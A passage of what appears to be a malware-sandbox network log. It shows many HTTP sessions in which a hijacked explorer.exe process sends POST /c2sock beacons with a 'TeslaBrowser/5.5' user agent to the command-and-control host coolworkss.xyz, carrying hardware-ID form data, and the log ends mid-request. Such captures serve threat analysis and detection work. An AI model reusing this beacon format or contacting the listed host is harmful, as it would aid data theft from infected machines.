                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    X-Powered-By: PHP/8.2.7
                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Set-Cookie: PHPSESSID=9u8qslvhght5enf5ogt0i5dlfa; expires=Sat, 30 Dec 2023 04:49:14 GMT; Max-Age=9999999; path=/
                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=cd2F7isNkqSDN51blVyvZW%2BbxnGnbHdyGoQbQ%2B2fDNQeDT%2Bfz4EmXk74yUQY%2BNhuIArVqGb1Diu8pMXUbEo2SSYuAZoPgz8NCM3zIkpuNIB3L9L2RYpQJqYVmEqgEuiSdQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 801dfb141aba8e06-MIA
                                                                                                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                    Data Ascii: 2ok
                                                                                                                                                    Sep 5, 2023 13:02:35.421907902 CEST2827INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    16192.168.2.449750172.67.195.22980C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Sep 5, 2023 13:02:35.757108927 CEST2828OUTPOST /c2sock HTTP/1.1
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                                                                    User-Agent: TeslaBrowser/5.5
                                                                                                                                                    Content-Length: 450
                                                                                                                                                    Host: coolworkss.xyz
                                                                                                                                                    Sep 5, 2023 13:02:35.759838104 CEST2828OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 32 39 45 41 34 44 43 32
                                                                                                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4D29EA4DC2284E848159532CDC512514CEF81D62--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data
                                                                                                                                                    Sep 5, 2023 13:02:36.162883997 CEST2829INHTTP/1.1 200 OK
                                                                                                                                                    Date: Tue, 05 Sep 2023 11:02:36 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    X-Powered-By: PHP/8.2.7
                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Set-Cookie: PHPSESSID=c5csl3mtmcenvlk8753n12p0r5; expires=Sat, 30 Dec 2023 04:49:15 GMT; Max-Age=9999999; path=/
                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KtTbERSw7G9F7YCZkaA40rFgvR4sUUQBWcgVd4byoCMd6ab0WGG%2FrfiIbi1hotS1qI%2B%2F0lwcHH%2Ba5i6OgryeUm3OKaVev%2BTfnwipVc68FzsRN13Rrw0YJPQGuSRbR6bM%2FQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 801dfb19eafe21eb-MIA
                                                                                                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                    Data Ascii: 2ok
                                                                                                                                                    Sep 5, 2023 13:02:36.162936926 CEST2830INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    17192.168.2.449751104.21.60.11180C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Sep 5, 2023 13:02:36.491511106 CEST2830OUTPOST /c2sock HTTP/1.1
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                                                                    User-Agent: TeslaBrowser/5.5
                                                                                                                                                    Content-Length: 450
                                                                                                                                                    Host: coolworkss.xyz
                                                                                                                                                    Sep 5, 2023 13:02:36.492686033 CEST2831OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 32 39 45 41 34 44 43 32
                                                                                                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4D29EA4DC2284E848159532CDC512514CEF81D62--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data
                                                                                                                                                    Sep 5, 2023 13:02:36.883812904 CEST2832INHTTP/1.1 200 OK
                                                                                                                                                    Date: Tue, 05 Sep 2023 11:02:36 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    X-Powered-By: PHP/8.2.7
                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Set-Cookie: PHPSESSID=58rgkfef7lq8ndd9rkf7vrila2; expires=Sat, 30 Dec 2023 04:49:15 GMT; Max-Age=9999999; path=/
                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7CXRWlmCsWJQLvtEud1rIQMohCDJBtdGkWHDxPLwOyV3Jx8ukqDV0xLD3BjeYeCWA3Lx05aN7nRuFIYHEXHIh3zMCtHFiDmp3E0QtReMb93sSMFi4HFaFIX%2Fafwzvs36zQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 801dfb1e7b0cdb2d-MIA
                                                                                                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                    Data Ascii: 2ok
                                                                                                                                                    Sep 5, 2023 13:02:36.883862972 CEST2832INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    18192.168.2.449752104.21.60.11180C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Sep 5, 2023 13:02:37.785239935 CEST2832OUTPOST /c2sock HTTP/1.1
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                                                                    User-Agent: TeslaBrowser/5.5
                                                                                                                                                    Content-Length: 450
                                                                                                                                                    Host: coolworkss.xyz
                                                                                                                                                    Sep 5, 2023 13:02:37.786729097 CEST2833OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 32 39 45 41 34 44 43 32
                                                                                                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4D29EA4DC2284E848159532CDC512514CEF81D62--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data
                                                                                                                                                    Sep 5, 2023 13:02:38.206876993 CEST2834INHTTP/1.1 200 OK
                                                                                                                                                    Date: Tue, 05 Sep 2023 11:02:38 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    X-Powered-By: PHP/8.2.7
                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Set-Cookie: PHPSESSID=omsoqsrl9p46ontso1r8b2l7dv; expires=Sat, 30 Dec 2023 04:49:17 GMT; Max-Age=9999999; path=/
                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=cxlHXa6bcrUiLVUcqPdtBT2J8O7IFSpH55TQrnJG%2FcJ2BGpwZdCWtEPrEqzC8aY3hLtWHn9NZwpqFPvvtabfpHqWR87v0Kyt5jUaVCxNrn0KAmpIyJl0Ro8iddAw%2FIIp3w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 801dfb2689328dbe-MIA
                                                                                                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                    Data Ascii: 2ok
                                                                                                                                                    Sep 5, 2023 13:02:38.206954956 CEST2834INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    19192.168.2.449753104.21.60.11180C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Sep 5, 2023 13:02:38.509397984 CEST2835OUTPOST /c2sock HTTP/1.1
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                                                                    User-Agent: TeslaBrowser/5.5
                                                                                                                                                    Content-Length: 450
                                                                                                                                                    Host: coolworkss.xyz
                                                                                                                                                    Sep 5, 2023 13:02:38.511251926 CEST2835OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 32 39 45 41 34 44 43 32
                                                                                                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4D29EA4DC2284E848159532CDC512514CEF81D62--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data
                                                                                                                                                    Sep 5, 2023 13:02:38.906524897 CEST2836INHTTP/1.1 200 OK
                                                                                                                                                    Date: Tue, 05 Sep 2023 11:02:38 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    X-Powered-By: PHP/8.2.7
                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Set-Cookie: PHPSESSID=g5t1kki069ljl59hlqppdf0kgi; expires=Sat, 30 Dec 2023 04:49:17 GMT; Max-Age=9999999; path=/
                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7y0iyAEotmHN25FfzdfZgEcSPyHA0NasiFH9H4L5MggiRCp7PNP8SnoxKFAl6frzX%2BbiWqUMXWrE%2FsUN%2B2YVFMpRRKAZhzze0hTMTL47GPoDiMmGpkbWvBkhpx4BRc2uRg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 801dfb2b1ff08dac-MIA
                                                                                                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                    Data Ascii: 2ok
                                                                                                                                                    Sep 5, 2023 13:02:38.906574011 CEST2836INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    2192.168.2.449719199.232.32.193443C:\Users\user\Desktop\lJ2eYRm0Bd.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    20192.168.2.449754104.21.60.11180C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Sep 5, 2023 13:02:39.227941036 CEST2837OUTPOST /c2sock HTTP/1.1
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                                                                    User-Agent: TeslaBrowser/5.5
                                                                                                                                                    Content-Length: 450
                                                                                                                                                    Host: coolworkss.xyz
                                                                                                                                                    Sep 5, 2023 13:02:39.230526924 CEST2837OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 32 39 45 41 34 44 43 32
                                                                                                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4D29EA4DC2284E848159532CDC512514CEF81D62--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data
                                                                                                                                                    Sep 5, 2023 13:02:39.628711939 CEST2838INHTTP/1.1 200 OK
                                                                                                                                                    Date: Tue, 05 Sep 2023 11:02:39 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    X-Powered-By: PHP/8.2.7
                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Set-Cookie: PHPSESSID=989mm3tsg542e1ap5po40cm5u0; expires=Sat, 30 Dec 2023 04:49:18 GMT; Max-Age=9999999; path=/
                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xLP30bNRZiE3NrGlsoIWlK1TCx6YFIz02RB5BtAxQhvmMLLxbRpfeYYfJaA0Y1z0bHUX5EA6s%2F4NlWK%2FL33iP9xeSFL57UIJSvJymaq7fg73NZsoakgAnUq%2BUUeAr5AAOA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 801dfb2f9bbe4c27-MIA
                                                                                                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                    Data Ascii: 2ok
                                                                                                                                                    Sep 5, 2023 13:02:39.628776073 CEST2838INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    21192.168.2.449755104.21.60.11180C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Sep 5, 2023 13:02:39.923727989 CEST2839OUTPOST /c2sock HTTP/1.1
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                                                                    User-Agent: TeslaBrowser/5.5
                                                                                                                                                    Content-Length: 450
                                                                                                                                                    Host: coolworkss.xyz
                                                                                                                                                    Sep 5, 2023 13:02:39.925218105 CEST2840OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 32 39 45 41 34 44 43 32
                                                                                                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4D29EA4DC2284E848159532CDC512514CEF81D62--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data
                                                                                                                                                    Sep 5, 2023 13:02:40.328150988 CEST2841INHTTP/1.1 200 OK
                                                                                                                                                    Date: Tue, 05 Sep 2023 11:02:40 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    X-Powered-By: PHP/8.2.7
                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Set-Cookie: PHPSESSID=c6km89po9uh3ina6sqcotc9922; expires=Sat, 30 Dec 2023 04:49:19 GMT; Max-Age=9999999; path=/
                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gAPKlvb1JJctEQn7M17iAaLNyCvS%2FkjoA6FgTXwcpbG6F1IKcGiU6iSefwexJNZ068LuK12N7c9EY4GF1LBPkEV5mk9mMTAb8j5GjgR%2F5O9jiXflWOBUWrivBv5JOkPGyA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 801dfb33ee8fdae5-MIA
                                                                                                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                    Data Ascii: 2ok
                                                                                                                                                    Sep 5, 2023 13:02:40.328222036 CEST2841INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    22192.168.2.449756104.21.60.11180C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Sep 5, 2023 13:02:40.648803949 CEST2841OUTPOST /c2sock HTTP/1.1
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                                                                    User-Agent: TeslaBrowser/5.5
                                                                                                                                                    Content-Length: 450
                                                                                                                                                    Host: coolworkss.xyz
                                                                                                                                                    Sep 5, 2023 13:02:40.649852991 CEST2842OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 32 39 45 41 34 44 43 32
                                                                                                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4D29EA4DC2284E848159532CDC512514CEF81D62--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"2--SqDe87817huf871793q74Content-Disposition: form-data
                                                                                                                                                    Sep 5, 2023 13:02:40.955079079 CEST2843INHTTP/1.1 200 OK
                                                                                                                                                    Date: Tue, 05 Sep 2023 11:02:40 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    X-Powered-By: PHP/8.2.7
                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Set-Cookie: PHPSESSID=hbsquif8hr9m1ktdc24rd6fhgq; expires=Sat, 30 Dec 2023 04:49:19 GMT; Max-Age=9999999; path=/
                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2yKRTZ%2FJDh0ZNIyNsTtXo65kP2uyrT96qSnCEuM0iwvMcR3cfbLndFAH2H9wluEehRtyHiByx5qiGq%2FkgMnefl6qAog1EpekV1%2FBPqebaygiSClTDO94SZGYyBvGDxaRpQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 801dfb387c004c27-MIA
                                                                                                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                    Data Ascii: 2ok
                                                                                                                                                    Sep 5, 2023 13:02:40.955123901 CEST2843INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    23192.168.2.449757172.67.195.22980C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Sep 5, 2023 13:02:41.297550917 CEST2843OUTPOST /c2sock HTTP/1.1
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                                                                    User-Agent: TeslaBrowser/5.5
                                                                                                                                                    Content-Length: 450
                                                                                                                                                    Host: coolworkss.xyz
                                                                                                                                                    Sep 5, 2023 13:02:41.299176931 CEST2844OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 32 39 45 41 34 44 43 32
                                                                                                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4D29EA4DC2284E848159532CDC512514CEF81D62--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"2--SqDe87817huf871793q74Content-Disposition: form-data
                                                                                                                                                    Sep 5, 2023 13:02:41.616164923 CEST2845INHTTP/1.1 200 OK
                                                                                                                                                    Date: Tue, 05 Sep 2023 11:02:41 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    X-Powered-By: PHP/8.2.7
                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Set-Cookie: PHPSESSID=craibc5i60a9fur74fjcvtc5pd; expires=Sat, 30 Dec 2023 04:49:20 GMT; Max-Age=9999999; path=/
                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=iUDbYrPs8Up%2Bnu3MGt6%2F3QLW8umzJdpbMffL1MRG%2FXqkE579YBdjCutnEyPDo%2BmHS4KB50lF1qMWXMBhehs0uM5oDx5oFv%2FbUjwb5DRwRwAjJ2l74%2B%2FURMmagnG9Pk%2FHug%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 801dfb3c88402886-MIA
                                                                                                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                    Data Ascii: 2ok
                                                                                                                                                    Sep 5, 2023 13:02:41.616200924 CEST2845INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    24192.168.2.449758172.67.195.22980C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Sep 5, 2023 13:02:41.968569994 CEST2846OUTPOST /c2sock HTTP/1.1
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                                                                    User-Agent: TeslaBrowser/5.5
                                                                                                                                                    Content-Length: 450
                                                                                                                                                    Host: coolworkss.xyz
                                                                                                                                                    Sep 5, 2023 13:02:41.969425917 CEST2846OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 32 39 45 41 34 44 43 32
                                                                                                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4D29EA4DC2284E848159532CDC512514CEF81D62--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"2--SqDe87817huf871793q74Content-Disposition: form-data
                                                                                                                                                    Sep 5, 2023 13:02:42.407244921 CEST2847INHTTP/1.1 200 OK
                                                                                                                                                    Date: Tue, 05 Sep 2023 11:02:42 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    X-Powered-By: PHP/8.2.7
                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Set-Cookie: PHPSESSID=g517e3odll2cqcknf3p9kgmo68; expires=Sat, 30 Dec 2023 04:49:21 GMT; Max-Age=9999999; path=/
                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=soKmNo5CHyuPuIe34NDICsW2gvkfAnb7UbLa7CPST%2BDqhxEKfT%2B2bpJPvSL9NGvPxb%2BAGIk3C%2BYS8sbnDdaF5BqeqYdBcMqE6uo2KUDYfLbGNoFNvn9DSOxEobz9ysJODQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 801dfb40bd0721f9-MIA
                                                                                                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                    Data Ascii: 2ok
                                                                                                                                                    Sep 5, 2023 13:02:42.407289028 CEST2847INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    25192.168.2.449759172.67.195.22980C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Sep 5, 2023 13:02:42.735210896 CEST2848OUTPOST /c2sock HTTP/1.1
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                                                                    User-Agent: TeslaBrowser/5.5
                                                                                                                                                    Content-Length: 450
                                                                                                                                                    Host: coolworkss.xyz
                                                                                                                                                    Sep 5, 2023 13:02:42.736463070 CEST2848OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 32 39 45 41 34 44 43 32
